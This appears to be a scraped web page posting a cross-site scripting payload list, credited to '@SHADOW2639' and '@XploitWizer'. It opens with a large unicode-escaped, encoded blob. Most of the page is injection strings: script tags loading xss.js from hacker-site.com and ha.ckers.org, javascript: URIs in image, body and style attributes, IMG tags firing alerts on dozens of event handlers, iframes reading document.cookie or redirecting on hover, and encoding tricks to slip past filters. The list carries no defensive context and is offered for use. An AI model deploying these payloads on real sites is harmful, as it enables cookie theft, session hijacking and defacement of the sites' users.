57\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0
039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u
006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\
u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062
\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u005
6\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u00
64\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u0
04e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u
0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\
u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b
\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u004
4\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u00
69\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0
041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u
0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\
u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041
\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005
a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u00
46\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0
050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u
0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\
u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044
\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002
b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u00
69\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0
067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>
</body> </html> <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> <SCRIPT>
alert(“XSS”); </SCRIPT> <BODY ONLOAD=alert("XSS")> <BODY
BACKGROUND="javascript:alert('XSS')"> <IMG SRC="javascript:alert('XSS');"> <IMG
DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <IFRAME
SRC=”http://hacker-site.com/xss.html”> <INPUT TYPE="IMAGE"
SRC="javascript:alert('XSS');"> <LINK REL="stylesheet"
HREF="javascript:alert('XSS');"> <TABLE BACKGROUND="javascript:alert('XSS')"> <TD
BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image:
url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));">
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> <EMBED
SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
&apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,8
3,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharC
ode(88,83,83))//--
&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,8
3,83))&lt;/SCRIPT&gt; &apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}
&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt; &lt;SCRIPT
SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; &lt;BASE
HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt; &lt;BGSOUND
SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; &lt;BODY
BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; &lt;BODY
ONLOAD=alert(&apos;XSS&apos;)&gt; &lt;DIV STYLE=&quot;background-image:
url(javascript:alert(&apos;XSS&apos;))&quot;&gt; &lt;DIV STYLE=&quot;background-
image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt; &lt;DIV
STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;%253Cscript
%253Ealert('XSS')%253C%252Fscript%253E <IMG SRC=x
onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onafterprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onbeforeprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onbeforeunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onhashchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onmessage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ononline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onoffline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onpagehide="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onpageshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onpopstate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onresize="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onstorage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onblur="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oncontextmenu="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oninput="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oninvalid="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onreset="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onsearch="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onselect="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onsubmit="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onkeydown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onkeypress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onkeyup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondblclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onmousedown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onmousemove="alert(String.fromCharCode(88,83,83))"> <IMG
SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onmouseover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onmouseup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onmousewheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onwheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondrag="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondragend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondragenter="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondragleave="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondragover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondragstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondrop="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onscroll="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oncopy="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oncut="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onpaste="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onabort="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oncanplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oncanplaythrough="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oncuechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondurationchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onemptied="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onended="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onloadeddata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onloadedmetadata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onloadstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onpause="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onplaying="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onprogress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onratechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onseeked="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onseeking="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onstalled="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onsuspend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ontimeupdate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onvolumechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onwaiting="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ontoggle="alert(String.fromCharCode(88,83,83))"> <META
onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; <IMG SRC=x
onload="alert(String.fromCharCode(88,83,83))"> <INPUT TYPE="BUTTON"
action="alert('XSS')"/> "><h1><IFRAME
SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME>123</h1> <IFRAME
SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME>123</h1>
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe
frameborder="0%EF%BB%BF "><h1><IFRAME width="420" height="315"
SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0"
onmouseover="alert(document.cookie)"></IFRAME>123</h1> "><h1><iframe width="420"
height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0"
allowfullscreen></iframe>123</h1> ><h1><IFRAME width="420" height="315"
frameborder="0"
onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmOb
PX3ooIQZr g'"></IFRAME>Hover the cursor to the LEFT of this
Message</h1>&ParamHeight=250 <IFRAME width="420" height="315" frameborder="0"
onload="alert(document.cookie)"></IFRAME> "><h1><IFRAME
SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME>123</h1> <iframe
src=http://xss.rocks/scriptlet.html < <IFRAME
SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME> <iframe
src="&Tab;javascript:prompt(1)&Tab;"> <svg><style>{font-
family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt
>alert&lpar;1&rpar; {Opera} <img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)" <img src=``&NewLine;
onerror=alert(1)&NewLine

By @SHADOW2639 xD

-------------------------@XploitWizer ---------------------------

You might also like